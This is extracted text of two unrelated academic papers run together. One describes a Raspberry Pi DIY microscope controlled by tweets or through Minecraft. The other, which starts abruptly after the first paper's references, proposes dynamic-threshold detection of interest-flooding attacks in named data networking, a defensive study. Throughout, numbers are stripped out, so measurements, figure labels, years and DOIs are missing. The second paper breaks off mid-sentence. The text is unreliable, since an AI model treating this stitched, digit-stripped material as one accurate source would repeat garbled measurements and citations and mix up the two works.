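as a rough illustration of the tweet-driven control just described, the following is a minimal, self-contained sketch of keyword-based command dispatch, using the command grammar described later in the paper ('singleimage', 'diyfocus', 'diytimelapse'). the handle and the stub action functions are illustrative placeholders; the authors' released script, which feeds real mentions in through tweepy's streaming api, differs.

```python
# minimal sketch of keyword dispatch for a tweet-driven microscope (illustrative only).
import re

HANDLE = "@diymicroscope"   # account the script listens for (assumed for illustration)

def capture_image(user):
    print(f"capturing a single image for {user}")

def move_stage(microsteps):
    print(f"moving stage by {microsteps:+d} microsteps")

def run_timelapse(duration_min, frames_per_min, user):
    print(f"timelapse for {user}: {duration_min} min at {frames_per_min} frames/min")

def dispatch(tweet_text, user):
    text = tweet_text.lower()
    if HANDLE not in text:
        return False                      # ignore tweets that do not mention the scope
    if "singleimage" in text:
        capture_image(user)
    elif m := re.search(r"diyfocus\s+(further|closer)\s+(\d+)", text):
        sign = 1 if m.group(1) == "further" else -1
        move_stage(sign * int(m.group(2)))
        capture_image(user)
    elif m := re.search(r"diytimelapse\s+duration\s+(\d+)\s+frequency\s+(\d+)", text):
        run_timelapse(int(m.group(1)), int(m.group(2)), user)
    else:
        return False
    return True

if __name__ == "__main__":
    dispatch("@diymicroscope please take a singleimage of my sample", "pellinglab")
    dispatch("@diymicroscope diyfocus further 32", "pellinglab")
```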
in this scenario, the diy microscope was assigned a twitter account (@diymicroscope), which monitored for simple commands sent by any other twitter user. simple message syntax was developed in order to allow other user to adjust microscope focus, capture single images or initiate time-lapse recordings. upon image capture, all data was stored on a publically accessible flickr account. in a second embodiment, we developed an approach to control a local diy microscope by exploiting the api of the popular video game minecraft. here, we first constructed a virtual lab inside of the minecraft world. in this scenario, one is able to ‘‘play’’ within this virtual world and use gaming actions to control a physical diy microscope. simple actions inside of the videogame allowed one to again adjust microscope focus, capture single images or initiate time-lapse recordings. in this case, the images are stored locally on the rpi hard drive. in this embodiment, there is no need for a consistent or reliable internet connection. to our knowledge, this is the only social media and video game controlled microscope. materials and methods diy microscope a basic diy microscope was constructed by employing strategies that have been previously demonstrated (cybulski, clements & prakash, ; switz, d’ambrosio & fletcher, ; cavanihac, ). briefly, the microscope was constructed using a raspberry pi (rpi) model b+ as the control computer, an rpi camera module (rasperry pi foundation, cambridge, uk), a discarded computer dvd-rom drive and a d printed frame (makerbot replicator ; makerbot, brookyln, ny, usa) (fig. a). all d printer files are available online at http://www.thingiverse.com/pellinglab. the original lens from the rpi camera module was removed prior to installation, leaving only the image sensor (omnivision ov - mpx; omnivision, santa clara, ca, usa). a web camera lens (logitech c ) was then inverted leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.thingiverse.com/pellinglab http://dx.doi.org/ . /peerj-cs. figure diy microscope construction. (a) a case was d printed in order to mount the rpi computer, camera and lens assembly and dvd-rom drive chassis. a sample stage was also d printed and mounted to the laser pickup assembly. (b) a simple motor driver was then employed to control the stepper motor with the gpio pins of the rpi. (c) calibration of the microscope was achieved by acquiring images of mi- crofabricated atomic force microscopy cantilevers. the lower cantilever has a known length of µm, corresponding to pixels in the image (scale bar= µm). full-size doi: . /peerjcs. /fig- leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. and installed on top of the image sensor. the rpi camera module and the lens were maintained in fixed positions relative to one another by mounting in a d printed mount. the dvd-rom drive was then disassembled leaving only the stepper motor, the laser pickup assembly and the frame intact. the drive was then mounted perpendicular to the rpi camera assembly in order to create a sample positioning stage that could be moved along the optical axis of the microscope in an inverted configuration. in order to fix the positions of each component of the entire assembly, a d printed frame was produced to which all components could be mounted. finally, a sample stage was d printed and mounted to the laser pickup assembly. 
this configuration allowed us to easily adjust sample position and focus under computer control. the movement of the sample tray was achieved by controlling the movement of the stepper motor by employing the easy driver stepper motor driver v . (http://www.schmalzhaus.com/easydriver) in -step micro stepping mode. the driver and a standard mm white led were connected to rpi via gpio pins in order to control sample positioning and illumination (fig. b). to calibrate the diy microscope, we acquired images of standard microfabricated cantilevers commonly employed used in atomic force microscopy. the cantilevers have known dimensions. the larger cantilever in the image is µm, corresponding to pixels in a , by pixel image (fig. c). online control of the diy microscope a python script was written that allows any twitter subscriber to remotely interact with the microscope via the twitter app or website. the code we developed is available online at https://github.com/pellinglab. the open source python library tweepy (http://www.tweepy.org) was employed to facilitate communication with twitter’s application programming interface (api). the microscope was assigned the twitter account @diymicroscope in order to facilitate user interaction. the python script running on the rpi monitors ‘tweets’ sent to the account @diymicroscope and examines them for simple key words. for example, the twitter user can capture single images, control sample positioning and focus, and initiate time-lapse imaging (details are presented in the ‘results and discussion’ section). online image capture and storage the rpi storage capacity can be limited as it is defined by the capacity of the sd card the user has employed. in order to prevent memory issues associated with a large number of image acquisitions, we utilized the photo-sharing website flickr (flickr.com), as an image hosting platform. to remotely and automatically interact with the flickr api, we implemented the beej flickr api python library (http://stuvel.eu/flickrapi). each time an image is acquired by the script (i.e., a single frame or a concatenate of frames), a copy is uploaded to the diy microscope’s flickr account. then the original image is removed then from the rpi hard drive to save space. offline control of the diy microscope to locally control the microscope, we designed a python script that will create a user interface in the videogame universe of minecraft (mojang). the code we developed is leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.schmalzhaus.com/easydriver https://github.com/pellinglab http://www.tweepy.org https://twitter.com/diymicroscope https://twitter.com/diymicroscope https://flickr.com http://stuvel.eu/flickrapi http://dx.doi.org/ . /peerj-cs. available online at https://github.com/pellinglab. we constructed a virtual lab in which user actions during game play can be used to initiate specific microscope functions. to achieve this, we employed the minecraft python api library (http://www.stuffaboutcode. com/p/minecraft-api-reference.html). inside the virtual laboratory, the sword-equipped player can control the microscope by performing specific actions with ‘control blocks’ inside the virtual laboratory. block actions were designed to allow the user to generate a live preview, capture an image and adjust the stage position for focus control. captured images are stored in a specific local folder for future use. 
results and discussion software design for twitter control when the python script is launched, an authentication procedure to flickr is initiated (a yahoo! account, api key and api secret are required), followed by an authentication to twitter (a twitter account, api key and api secret, token and secret token are required). both accounts must be established and verified by the system administrator in advance. the flickr account is required for storage of images acquired by the diy microscope. the diy microscope will be addressed and controlled by sending ‘tweets’ that mention the system specified twitter account. when the authentication between flickr and twitter is correctly established, the script connects to twitter’s streaming api with specific keywords. this allows the program to obtain real-time tweets from the social network. when a user sends a tweet to the system-specified twitter account containing single, or multiple, keywords, a javascript object notation (json) object is returned by the streaming api, containing parameters such as the user name, screen name, location, tweet content and the time. the json object is then examined and conditional actions are undertaken depending on the keywords identified in the tweet (fig. ). importantly, to avoid any unwanted interactions with the diy microscope (i.e., a random user has one of the keywords in their tweets), the requesting user must include the system-specified twitter handle (e.g., @example) in their tweet. in this embodiment, we designed four types of user interaction, such as taking a single image, initiating a timelapse, adjusting the focus and obtaining a ‘focus group’ image (figs. and ). when the tweet contains the keyword ‘singleimage’ (fig. a), the current image frame captured by the rpi camera is temporarily stored on the rpi, a scale bar is drawn on the image and returned to the requesting user in a twitter message (fig. b). in addition to the returned image, the reply tweet also includes the message ‘@user scale bar is x_units’’, where @user is the twitter handle of the requesting user and x_units=value determined by the user after microscope calibration. finally, the temporarily stored local copy of the image is then uploaded to the user specified flickr account and permanently removed from the rpi. in fig. , a single image is requested by the user @pellinglab and an image of cellulose derived from apples (modulevsky et al., ) is acquired and returned by the microscope. to move the stage in order to focus the sample, the user sends a tweet to the diy microscope that includes the keywords ‘diyfocus further n’ or ‘diyfocus closer n’ (n = leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/pellinglab http://www.stuffaboutcode.com/p/minecraft-api-reference.html http://www.stuffaboutcode.com/p/minecraft-api-reference.html http://dx.doi.org/ . /peerj-cs. figure flow-chart representing our python script that enables twitter-based user interaction with the diy microscope. full-size doi: . /peerjcs. /fig- integer value). the sample stage will then move further away, or closer to, the rpi camera by n microsteps. an image will be acquired after moving to the new position, sent back to the user through twitter and stored on flickr as above. if the user wants to sample multiple focus positions, a tweet is constructed which includes the keywords ‘diyfocus dofocus n’ (n = integer value). 
in this scenario, the sample platform is moved away from the rpi camera by n microsteps and an image is acquired. the sample then moves another n microsteps away from the camera a second image is obtained before moving back to the original position. the process is then repeated in the opposite direction in order to acquire image number and . the four locally stored images are uploaded to flickr, along with their metadata (the twitter handle of the requesting user, the original message sent by the user, n and the corresponding frame number), and then concatenated into a single by pixel image (fig. a). the concatenated image is then returned to the user with the corresponding frame numbers printed on each sub-image along with the message ‘@user your n microstep dofocus sequence is complete’ (where @user and n are determined from the original user message). the user can now adjust the stage position to the desired leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure twitter acquisition of a single image from the diy microscope. (a) the account @pellinglab initiates image acquisition by posting a tweet that mentions the account @diymicroscope and includes the keyword ‘singleimage’. other text can be included in the message but the script will ignore them. (b) the diy microscope acquires an image and responds to the resting account. full-size doi: . /peerjcs. /fig- location (using the ‘diyfocus further/closer’ keywords, followed by an appropriate integer value). in fig. a, the concatenated image of a hematoxylin and eosin stained histology sample being moved in and out of focus is shown. finally, the user can initiate a time lapse using the ‘diytimelapse duration d frequency f’ keywords, replacing the ‘d’ and ‘f’ with integers for duration and frequency, respectively. the d and f, values assume units of minutes and frames/minute, respectively. the timelapse is carried out as requested and each acquired image is uploaded to flickr along with its corresponding metadata (the twitter handle of the requesting user, the original message sent by the user, d, f and the corresponding frame number). upon completion of the timelapse, a concatenated image containing the first and last frame of the time lapse is constructed and returned to the user with the frame numbers printed on each sub-image (fig. b). the returned image also includes the message ‘@user your timelapse of d minutes at f frames/minute is now complete’ (where @user, d and f are determined leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://twitter.com/pellinglab https://twitter.com/diymicroscope https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure focus and time-lapse control through twitter interactions. (a) the command ‘diyfocus dofo- cus n’ initiates image capture of the sample when moved to four specific positions. the user is then pro- vided with a concatenated image containing the four acquired, and indexed, images. this routine allows the user to determine the optimal sample position in order to set the focus. (continued on next page...) full-size doi: . /peerjcs. /fig- leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure (...continued) in this case, a sample histology slide was employed for imaging. 
as these images are only for stage posi- tioning purposes no scale bar is included; however, each image is . × . mm. (b) it is also possible to initiate time-lapse imaging using the keywords ‘diytimelaspe duration d frequency f’, d and f, corre- spond to integer values with units of minutes and frames/minute, respectively. in this case, brine shrimp (artemia—commonly grown as live feed for fish larva) were imaged with the microscope. a final image is returned to the user that only contains the first and last image acquired during the timelapse interval. all images from the sequence are stored on flickr along with any relevant metadata. no scale bar is provided in this example; however, the scale is known after user calibration and relevant details are included in the flickr metadata. in this case each image is . × . mm. from the original user message). in fig. b, time-lapse microscopy was conducted on a sample of artemia (brine shrimp) and the image sent back to the user through twitter is shown. four images were acquired (duration of one minute at a frequency of four images per minute) and as described above, only the first and last images are sent to the user through twitter. all images in the sequence are stored on flickr for later analysis by the user. importantly, whenever an image is uploaded to flickr (irrespective of the keyword(s) employed), specific metadata is included with the image in order to allow for identification and filtering. the metadata associated with each image includes the twitter handle of the requesting user, the keyword(s), a timestamp and the frame number. software design for minecraft control in situations where a user may lack internet access, we designed an approach for local, offline, control of the diy microscope. in this case, we designed a python script that allows for user interaction through the videogame minecraft (fig. ). conveniently, minecraft is already included in the freely available raspbian distribution of linux for the rpi. when our python script is launched, the player position is immediately updated to be facing the virtual ‘laboratory’ (fig. ). upon entering the laboratory, a sword-equipped player can now interact with the diy microscope ‘control blocks’ (fig. a). when standing in front of the desired control block, the right mouse button can be used to initiate a specific action. such actions will return an event object, containing the coordinates of the specific block as a tuple. the coordinate tuple is then used to initiate conditional actions that are used to control the ‘real-life’ diy microscope. when the player activates one the extremity blocks (black and grey blocks), the stepper motor will perform n microsteps clockwise (or counterclockwise). the user can specify n in the python script. the yellow block will display a live preview of the sample, on a by pixels window (fig. b). the blue blocks will take a single image when activated, and save the image as a ‘‘.png’’ file on the rpi. to avoid over usage of the gpu memory, the program will close live preview (if open) prior to acquiring an image. a message on the minecraft user-interface is displayed when the image is successfully stored (fig. c). leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure flow-chart representing our python script that enables minecraft-based user interaction with the diy microscope. full-size doi: . /peerjcs. 
/fig- conclusions possible limitations the twitter public streaming api limits the application to a fixed number of keyword filters per application (twitter, inc, ). the current application only requires keywords (‘‘singleimage’’,’’diyfocus’’ and ‘‘diytimelapse’’) to initiate user-interaction, however, more complex interactions may require many more keywords. as well, user-interaction is also limited by the number of allowed connections to the api per hour (twitter, inc, ) but the exact number is not currently publically available. importantly, a user will also receive an error message from twitter if they post the exact same tweet multiple times leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure the minecraft environment. (a) the user simply uses the sword to control a locally connected diy microscope by interacting with the four control blocks inside of a virtual ‘laboratory’. the blocks al- low the user to adjust the sample stage up and down (black/gray blocks), (b) obtain a live preview (yel- low block) and (c) acquire an image (cyan block). full-size doi: . /peerjcs. /fig- leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. over a short time period. therefore, twitter will not allow a single user to post the tweet ‘@diymicrosocpe singleimage’ more than once. the user can overcome this limitation by adding more text to the tweet or deleting the original tweet. currently, the flickr api also limits the application to , requests per hour (yahoo!, ). some other limitations can also arise if multiple users are attempting to interact with the microscope simultaneously. for instance, if a time-lapse sequence is initiated, the script will complete the image acquisition before returning to the stream listener. in this case, a user sending a request will not get an immediate response from the microscope. finally, the microscope is inherently limited to the presence and stability of internet connectivity available to the rpi. in the case of a lost connection, the script will have to be re-executed in order to establish a connection to the twitter streaming api and flickr api. to overcome the issue with internet connectivity, we also implemented a control interface within the minecraft universe. of course, electrical power is always required as with any modern microscope. however, it is possible to power the rpi using solar panels and batteries in cases where microscopic imagery is required but electrical connections are not easily accessed. as the minecraft implementation of the diy microscope stores pictures locally, the maximum storage space will depend on the sd card capacity. cloud storage can be implemented with the minecraft program, but will require an internet connection. however, if storage space becomes a limitation, the user can move the files to an alternative storage device (usb stick or via local file transfer) or employ a larger sd card. possible extensions future versions of both the twitter and minecraft interfaces could include image analysis features, such as cell counting, cell tracking for time lapses, image redundancy protections and thresholding by implementing opencv or other methods (itseez, ). such integration could allow the user to obtain qualitative and quantitative from the sample, in a remote or local way. 
an automatic focusing library could also be implemented to both program to enhance image quality acquisition rapidity. in its current implementation, our approach does not maintain privacy as all micro blogging posts and pictures on twitter and flickr are publicly available. in order to overcome this potential limitation, a smart phone based application could easily be developed to interact with the current version of the microscope, either via a direct connection (wifidirect or bluethooth) or a web-based server. such a configuration could allow the user to use customize features, independent from twitter, flickr and minecraft apis, consequently avoiding the rate limitation from the third-parties. this will also be important for the implementation of a potential multi-user platform. although the purpose of this study was to present a proof-of-concept implementation of using social media and video games to control our microscope, one can imagine extending this platform to allowing multi-user experiments. future work will require rigorous testing to ensure the robustness of our embodiment for such applications. of potential interest is that both of our approaches can also be exploited on other types of laboratory equipment. one can easily interface the multiple outputs of the rpi to an existing or ‘‘hand-made’’ equipment, or extends existing programs (baden et al., ; keulartz & van den belt, ; pearce, ; landrain et al., ). future use of leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the minecraft program can let access to multiple player in the ‘‘virtual laboratory’’, either by a local or internet connection. this let the possibility for the ‘‘players’’ to cooperatively interact and controls ‘‘real’’ physical laboratory equipment inside a virtual world. acknowledgements the authors would like to thank daniel modulevsky and dr. charles cuerrier for providing the histological sample for imaging. additional information and declarations funding this work was supported by the national sciences and engineering research council discovery grant. andrew e. pelling is supported by the canada research chairs program. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national sciences and engineering research council discovery grant. canada research chairs program. competing interests the authors declare there are no competing interests. author contributions • maxime leblanc-latour conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • craig bryan conceived and designed the experiments, contributed reagents/materials/- analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. • andrew e. pelling performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: github: https://github.com/pellinglab/minerscope_and_twitterscope. references baden t. . biropette: customisable, high precision pipette. thingiverse. available at http://www.thingiverse.com/thing: . leblanc-latour et al. ( ), peerj comput. sci., doi . 
/peerj-cs. / https://peerj.com https://github.com/pellinglab/minerscope_and_twitterscope http://www.thingiverse.com/thing: http://dx.doi.org/ . /peerj-cs. baden t, chagas am, gage g, marzullo t, prieto-godino ll, euler t. . open labware: -d printing your own lab equipment. plos biology ( ):e doi . /journal.pbio. . cavanihac j-m. . diy: an inverted microscope with electronicfocusing. micscape magazine. available at http://www.microscopy-uk.org.uk/mag/indexmag.html?http: //www.microscopy-uk.org.uk/mag/artaug /jmc-constr .html. chai biotechnologies inc. a. openpcr—the $ open source pcrmachine/thermal cycler. available at http://openpcr.org/ . chai biotechnologies inc. b. open qpcr: the $ real-time pcr machine. available at https://www.chaibio.com/openqpcr. contreras-naranjo jc, wei q, ozcan a. . mobile phone-based microscopy, sensing, and diagnostics. ieee journal of selected topics in quantum electronics ( ): – doi . /jstqe. . . cybulski js, clements j, prakash m. . foldscope: origami-based paper microscope. plos one ( ):e doi . /journal.pone. . garvey c. . arduino water bath for diybio. available at https://github.com/ cathalgarvey/kettlekontroller. ibanez l. . the kitware blog—diy microscopy: optical mouse lens + ipad. available at http://www.kitware.com/blog/home/post/ . itseez. . opencv. available at http://opencv.org/ . keulartz j, van den belt h. . diy-bio—economic epistemological and ethical implications and ambivalences. life sciences, society and policy ( ): – doi . /s - - - . kim h, gerber lc, riedel-kruse ih. . nteractive biotechnology: building your own biotic game setup to play with living microorganisms. in: proceedings of the chi conference extended abstracts on human factors in computing systems. new york: acm, – . landrain t, meyer m, perez am, sussan r. . do-it-yourself biology: challenges and promises for an open science and technology movement. systems and synthetic biology ( ): – doi . /s - - - . long j. . gel electrophoresis system (mini). available at http://www.instructables. com/id/gel-electrophoresis-system-mini/ . mcleod e, ozcan a. . unconventional methods of imaging: computational mi- croscopy and compact implementations. reports on progress in physics ( ): doi . / - / / / . miller j. . open source orbital shaker. available at https://www.thingiverse.com/ thing: . modulevsky dj, lefebvre c, haase k, al-rekabi z, pelling ae. . apple derived cellulose scaffolds for d mammalian cell culture. plos one ( ):e doi . /journal.pone. . pearce jm. . materials science. building research equipment with free, open-source hardware. science ( ): – doi . /science. . leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pbio. http://www.microscopy-uk.org.uk/mag/indexmag.html?http://www.microscopy-uk.org.uk/mag/artaug /jmc-constr .html http://www.microscopy-uk.org.uk/mag/indexmag.html?http://www.microscopy-uk.org.uk/mag/artaug /jmc-constr .html http://openpcr.org/ https://www.chaibio.com/openqpcr http://dx.doi.org/ . /jstqe. . http://dx.doi.org/ . /journal.pone. https://github.com/cathalgarvey/kettlekontroller https://github.com/cathalgarvey/kettlekontroller http://www.kitware.com/blog/home/post/ http://opencv.org/ http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://www.instructables.com/id/gel-electrophoresis-system-mini/ http://www.instructables.com/id/gel-electrophoresis-system-mini/ http://dx.doi.org/ . / - / / / https://www.thingiverse.com/thing: https://www.thingiverse.com/thing: http://dx.doi.org/ . 
/journal.pone. http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. pelling ae. . diy co incubator bioreactor for mammalian cell culture. available at https://www.pellinglab.net/single-post/diy/diy-co -incubator-bioreactor-for- mammalian-cell-culture. skandarajah a, reber cd, switz na, fletcher da. . quantitative imaging with a mobile phone microscope. plos one ( ):e doi . /journal.pone. . smith zj, chu k, espenson ar, rahimzadeh m, gryshuk a, molinaro m, dwyre dm, lane s, matthews d, wachsmann-hogiu s. . cell-phone-based platform for biomedical device development and education applications. plos one ( ):e doi . /journal.pone. . switz na, d’ambrosio mv, fletcher da. . low-cost mobile phone mi- croscopy with a reversed mobile phone camera lens. plos one ( ):e doi . /journal.pone. . synbiota. . synbiota homepage. available at https://synbiota.com/ . twitter, inc. . connecting to a streaming endpoint. available at https://dev.twitter. com/streaming/overview/connecting. watts m. . magnetic stirrer. available at http://www.teklalabs.org/magnetic-stirrer/ . wong ap, gupta m, shevkoplyas ss, whitesides gm. . egg beater as centrifuge: isolating human blood plasma from whole blood in resource-poor settings. lab chip ( ): – doi . /b c. wong g, wong i, chan k, hsieh y, wong s. . a rapid and low-cost pcr thermal cycler for low resource settings. plos one ( ):e doi . /journal.pone. . yahoo!. . flickr: the flickr developer guide—api. available at https://www.flickr. com/services/developer/api/ . zhu h, mavandadi s, coskun af, yaglidere o, ozcan a. . optofluidic fluorescent imaging cytometry on a cell phone. analytical chemistry ( ): – doi . /ac a. leblanc-latour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.pellinglab.net/single-post/diy/diy-co -incubator-bioreactor-for-mammalian-cell-culture https://www.pellinglab.net/single-post/diy/diy-co -incubator-bioreactor-for-mammalian-cell-culture http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. https://synbiota.com/ https://dev.twitter.com/streaming/overview/connecting https://dev.twitter.com/streaming/overview/connecting http://www.teklalabs.org/magnetic-stirrer/ http://dx.doi.org/ . /b c http://dx.doi.org/ . /journal.pone. https://www.flickr.com/services/developer/api/ https://www.flickr.com/services/developer/api/ http://dx.doi.org/ . /ac a http://dx.doi.org/ . /peerj-cs. detection of malicious consumer interest packet with dynamic threshold values detection of malicious consumer interest packet with dynamic threshold values adnan mahmood qureshi , nadeem anjum , rao naveed bin rais , masood ur-rehman and amir qayyum computer science, capital university of science and technology, islamabad, pakistan college of engineering and it, ajman university, ajman, united arab emirates james watt school of engineering, university of glasgow, glasgow, uk abstract as a promising next-generation network architecture, named data networking (ndn) supports name-based routing and in-network caching to retrieve content in an efficient, fast, and reliable manner. most of the studies on ndn have proposed innovative and efficient caching mechanisms and retrieval of content via efficient routing. however, very few studies have targeted addressing the vulnerabilities in ndn architecture, which a malicious node can exploit to perform a content poisoning attack (cpa). 
this potentially results in polluting the in-network caches, the routing of content, and consequently isolates the legitimate content in the network. in the past, several efforts have been made to propose the mitigation strategies for the content poisoning attack, but to the best of our knowledge, no specific work has been done to address an emerging attack-surface in ndn, which we call an interest flooding attack. handling this attack-surface can potentially make content poisoning attack mitigation schemes more effective, secure, and robust. hence, in this article, we propose the addition of a security mechanism in the cpa mitigation scheme that is, name-key based forwarding and multipath forwarding based inband probe, in which we block the malicious face of compromised consumers by monitoring the cache-miss ratio values and the queue capacity at the edge routers. the malicious face is blocked when the cache-miss ratio hits the threshold value, which is adjusted dynamically through monitoring the cache-miss ratio and queue capacity values. the experimental results show that we are successful in mitigating the vulnerability of the cpa mitigation scheme by detecting and blocking the flooding interface, at the cost of very little verification overhead at the ndn routers. subjects computer networks and communications, emerging technologies, security and privacy keywords content poisoning attacks, named data networking, maliciousconsumer interestpacket, mitigation techniques, dynamic threshold introduction named data networking (ndn) is a well-known and well-researched architecture for the next generation of the internet, based on a data-centric approach. while the legacy network is based on a host-centric system, the ndn architecture has changed the internet’s communication model altogether (jacobson et al., ). it allows the distribution of data that can be acquired from any content router from the network. how to cite this article qureshi am, anjum n, rais rnb, ur-rehman m, qayyum a. . detection of malicious consumer interest packet with dynamic threshold values. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted february published march corresponding author nadeem anjum, nadeem.anjum@cust.edu.pk academic editor vicente alarcon-aquino additional information and declarations can be found on page doi . /peerj-cs. copyright qureshi et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:nadeem.�anjum@�cust.�edu.�pk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ a content provider can produce the data in advance and place it as auxiliary storage that can be accessed by any consumer anytime, even if the producer gets offline. a producer does not have to be online, and a consumer does not have to be connected to the producer to fetch the data; instead, the consumer can acquire data through in-networking caches. while ndn increases content availability in the network via in-network caching, the integrity of content becomes critical, given ndn’s nature (tarkoma, ain & visala, ). hence, ndn opens several security-related issues that are not relevant to the legacy network communication. it includes some new types of data integrity attacks where a malicious or compromised node provides a corrupted copy of the content. 
these issues are often ignored in ndn-related communication and caching mechanisms and are our main focus in this article. one of the most critical attack vectors in ndn is the content poisoning attack, in which the attacker compromises a content router (cr) and this compromised cr replies to legitimate requests with bogus or corrupted content. hu et al. ( ) proposed a comprehensive scheme to mitigate the content poisoning attack (cpa): a special interest packet is generated by the consumer, which carries the hash of the poisoned data. this article concerns the identification and mitigation of security flaws that can be exploited by an attacker during this cpa mitigation process. the research problem lies in the cpa mitigation scheme proposed by hu et al. ( ). a consumer with malicious intent can flood the network with interest packets carrying the hash digest of legitimate, un-poisoned data in the exclude filter field. during cpa mitigation, such packets can flood the network, because each one triggers multipath forwarding and on-demand verification of the hash at the router. this flooding attack can severely degrade the throughput of the network or even cause a denial of service for other legitimate consumers. therefore, it is essential to add this additional security feature alongside cpa mitigation (qureshi & anjum, ). in this article, we propose a scheme to detect the flooding attack generated by a compromised consumer. a satisfaction test is performed to check whether the excluded interest packet refers to content that is non-existent in the cache or to a legitimate packet. if the cache-miss ratio of the excluded interest packets reaches the threshold value, it is considered an attack. a lightweight parameter is added to the content store data structure, which stores the cache-miss counter value. this value is compared with the specified threshold value, and when the cache-miss counter approaches that threshold, an event is raised that blocks the incoming malicious face. moreover, in our scheme the threshold value is adaptable: initially, it is calculated by taking the total buffer size and dividing it by the verification rate. the proposed idea is that when the average cache-miss ratio crosses a set percentage and the queue capacity saturates, the threshold value is reduced by half; this process continues until the value reaches one (a minimal sketch of this detection logic is given below). the article's main contribution is the addition of a security feature that closes the attack surface that can be exploited by a malicious consumer. our contributions are: (i) dynamic adjustment of the threshold value by monitoring the cache-miss ratio and queue capacity, and (ii) detection and mitigation of the flooding attack of special interest packets generated while mitigating the content poisoning attack. further, this article is organized into five sections: the second section covers the literature review and related work, the third section presents the proposed approach, the fourth section reports experiments and results, and the fifth section concludes. related work any network's primary goal is to share web content, including photographs, texts, and videos.
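the following is the minimal sketch referred to above of the edge-router detection logic: a per-face cache-miss counter for special (exclude-filter) interests, a threshold initialized to buffer size divided by verification rate, and halving of the threshold when the average cache-miss ratio and the queue occupancy are both high. the 0.5 and 0.9 levels and the class layout are illustrative assumptions, since the exact values are elided in this copy of the text; this is not the authors' simulation code.

```python
# minimal sketch of dynamic-threshold detection of malicious exclude-filter interests.
class FloodDetector:
    def __init__(self, buffer_size, verification_rate,
                 miss_ratio_level=0.5, queue_level=0.9):
        self.threshold = max(1, buffer_size // verification_rate)
        self.miss_ratio_level = miss_ratio_level
        self.queue_level = queue_level
        self.misses = {}       # face id -> cache-miss counter
        self.requests = {}     # face id -> special-interest counter
        self.blocked = set()

    def on_special_interest(self, face, cache_hit, queue_occupancy):
        """called for each exclude-filter interest arriving on a face."""
        if face in self.blocked:
            return "blocked"
        self.requests[face] = self.requests.get(face, 0) + 1
        if not cache_hit:
            self.misses[face] = self.misses.get(face, 0) + 1
        self._adapt_threshold(queue_occupancy)
        if self.misses.get(face, 0) >= self.threshold:
            self.blocked.add(face)            # raise the event that blocks this face
            return "blocked"
        return "forwarded"

    def _adapt_threshold(self, queue_occupancy):
        total_req = sum(self.requests.values())
        total_miss = sum(self.misses.values())
        avg_miss_ratio = total_miss / total_req if total_req else 0.0
        if avg_miss_ratio > self.miss_ratio_level and queue_occupancy > self.queue_level:
            self.threshold = max(1, self.threshold // 2)   # halve, never below one

if __name__ == "__main__":
    det = FloodDetector(buffer_size=64, verification_rate=4)
    for _ in range(40):   # a face repeatedly excluding content that is never in the cache
        state = det.on_special_interest("consumer-1", cache_hit=False, queue_occupancy=0.95)
    print(state, det.threshold)
```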
implementing security standards and goals such as confidentiality, integrity, and availability can ensure robust and flawless communication. confidentiality guarantees that only approved individuals can access the data. integrity means that the data received by the receiver must be identical to the data sent by the sender. availability ensures that the network infrastructure is available to an authorized user whenever the service is needed (wein et al., ). kumar et al. ( ) and hassanein & zulkernine ( ) described some of the most common attacks within the existing tcp/ip model, such as the denial of service (dos) attack, distributed denial of service (ddos) attack, eavesdropping (snooping), masquerading, tcp replay attack, man-in-the-middle attack, repudiation, and traffic analysis attack. these legacy attacks are not possible in ndn because of the absence of the host, but with the advent of this new architecture, some new attack surfaces have emerged which need to be addressed, and this is an active research area. ndn's data-centric security and security issues in ndn at the network layer of ndn, data-centric security is mandated via a digital signature on each data packet. a digital signature is added by the content provider (producer) to every data packet, binding the data to the packet name at the time the data is generated. the consumer can authenticate a data packet by verifying the signature using the content provider's public key, and this authentication can be performed even if the data is retrieved from an entity other than the content provider (ribeiro et al., ). zhang et al. ( ) stated that if the content provider's public key is not distributed, or the consumer has no information about this public key, the data producer places the signing key name into a specific field of the data packet known as the keylocator field. a consumer can acquire the public key by following 